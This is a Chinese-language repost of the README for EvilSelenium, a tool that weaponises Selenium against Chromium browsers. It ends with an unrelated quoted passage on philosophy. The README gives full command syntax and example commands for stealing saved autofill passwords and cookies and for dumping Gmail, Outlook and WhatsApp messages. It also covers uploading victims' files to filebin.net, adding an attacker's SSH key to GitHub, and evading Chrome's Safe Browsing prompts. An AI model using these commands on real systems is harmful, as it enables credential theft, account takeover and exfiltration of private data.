渗透工具EvilSelenium:将Selenium武器化以滥用基于Chromium的浏览器
Git地址:
fmrd0x/EvilSelenium: EvilSelenium is a tool that weaponizes Selenium to attack Chromium based browsers. (github.com)
EvilSelenium
EvilSelenium是一个新项目,它将Selenium武器化以滥用基于Chromium的浏览器。目前的功能是:
- 窃取存储的凭据(通过自动填充)
- 偷饼干
- 截取网站截图
- 转储 Gmail/O365 电子邮件
- 转储WhatsApp消息
- 下载和泄露文件
- 将 SSH 密钥添加到 GitHub
或者扩展现有功能以满足您的需求(例如,从用户的 GDrive/OneDrive 下载文件)。
注意
当此工具运行时,它将终止任何现有的浏览器进程,以便能够使用包含密码和活动会话的用户浏览器配置文件运行。
我在大约一周内构建了这个工具,我没有运行尽可能多的测试,因此可能会有一些错误。
EvilSelenium模块并不总是稳定的。由于网站的不断变化,某些模块可能偶尔会中断。我将尽力维护现有模块,以确保它们按预期工作,但您已经收到警告。
用法
EvilSelenium.exe /?/help - Show this help menu.SETUP:/install - Install chromedriver & Selenium webdriver. Run this once.GLOBAL: (accepted with every command)/browserdir [appdata_local_routing] - Use custom browser, Input should be the routing inside %appdatalocal% dir (e.g. "Microsoft\Edge")RECON:/enumsavedsites [out_path] - Check which websites have passwords saved via screenshot(s)./screenshot [website] [out_path] - Screenshot a given webpage.CREDENTIALS:/autorun - Extract saved credentials from common websites./dynamicid [login_page] [username_id] [password_id] - Extract saved credentials from a website, providing the username field ID & password field ID./dynamicname [login_page] [username_name] [password_name] - Extract saved credentials from a website, providing the username field name value & password name value./dynamicname2 [login_page] [username_position] [password_position] [username_name] [password_name] - Extract saved credentials from a website, providing the username field name value, password name value and their positions.COOKIES:/cookies [website] - Grabs cookies for a given website.MODULES:/download [file_url] [seconds] - Downloads a file and specify time to wait for download to finish. File extensions should not be executable./exfil [local_file] [seconds] - Uploads a file on filebin.net and outputs the download link./gmail [out_path] [num_of_emails] - Fetches emails from mail.google.com if user is authenticated. Max 50 emails./outlook [out_path] [num_of_emails] - Fetches emails from Outlook if user is authenticated./o365 [out_path] [num_of_emails] - Fetches emails from O365 Outlook if user is authenticated./github [key] - Add your SSH key to Github if user is authenticated./whatsapp [out_path] - Fetches Whatsapp messages if user is authenticated (BETA).
设置
该命令将下载Chrome驱动程序和Selenium WebDriver,这是必要的要求。EvilSelenium将在Chrome版本100-90上运行。/install
在Windows 10,Chrome v97和v90上测试。
EvilSelenium.exe /install
全局配置
默认情况下,EvilSelenium将尝试使用Google Chrome的用户数据文件夹来检索数据,但也支持其他基于Chromium的浏览器。
为了使用不同的基于Chrome的浏览器,您应该在目录中添加以下浏览器路由。以下是一些常见浏览器的示例(应添加到任何 CLI 命令中):/browserdir
%localappdata%
- 勇敢 -
/browserdir BraveSoftware\Brave-Browser
- 微软边缘 -
/browserdir Microsoft\Edge
- 维瓦尔第 -
/browserdir Vivaldi
侦察模块
/enumsavedsites
- 这将截取 chrome://settings/passwords 的屏幕截图
/screenshot
- 截图任何网站。如果用户已通过网站身份验证,则:)获得经过身份验证的屏幕截图。
凭据模块
重要:凭据模块将删除 COOKIE,以便从自动填充中窃取凭据。理想情况下,如果要导出 Cookie,则应使用末尾的凭据模块。
/autorun
- 为常见网站预构建的模板。我将继续添加更多内容。
/dynamicid
- 提供登录 URL 以及用户名输入字段的 ID 和密码字段的 ID。这等效于 document.getElementById()。
/dynamicname
- 如果字段没有 ID,请提供字段的名称值。它将选取名称值的第一个索引。这等效于 document.getElementsByName()[0].value。
/dynamicname2
- 提供字段的名称值及其索引位置。这等效于 document.getElementsByName()[x].value,其中 x 是提供的位置。
cookie模块
/cookies
- 从指定网站转储 Cookie。
杂项模块
这些是我构建的附加模块,用于演示您可以使用Selenium执行哪些操作。
/download
- 下载文件并指定等待下载的时间。在下载之前,应将不可执行的文件扩展名附加到文件中,以避免 Chrome 的安全浏览提示。
/exfil
- 在 filebin.net 上传文件并指定等待上传完成的时间。上传完成后,将写入文件的下载链接。
/gmail
- 如果用户已通过身份验证,则从 mail.google.com 中获取电子邮件。最多 50 封电子邮件。
/outlook
- 如果用户经过身份验证,则从 Outlook 获取电子邮件。
/o365
- 如果用户已通过身份验证,则从 O365 Outlook 获取电子邮件。
/github
- 如果用户已通过身份验证,请将您的 SSH 密钥添加到 Github。
/whatsapp
- 如果用户经过身份验证(BETA),则获取Whatsapp消息。
示例命令
EvilSelenium.exe /screenshot https://mail.google.com c:\users\mr.d0x\downloadsEvilSelenium.exe /dynamicid https://www.hybrid-analysis.com/login login_email login_passwordEvilSelenium.exe /dynamicname https://linkedin.com session_key session_password
演示
🏹每日分享🏹:
不少人羡慕他人在生活中发现和遇到饶有趣味的事情,其实前者应该羡慕后者所具有的理解事物的禀赋才对。正是归因于他们理解事物的禀赋,他们经历过的事情,在其描绘中,都带有某种韵味。这是因为在一个思想丰富的人看来是意味深长的事情,对于一个肤浅、头脑庸俗的人来说,却不过是平凡世界里面的乏味一幕而已。
一《人生的智慧 第一章 基本的划分》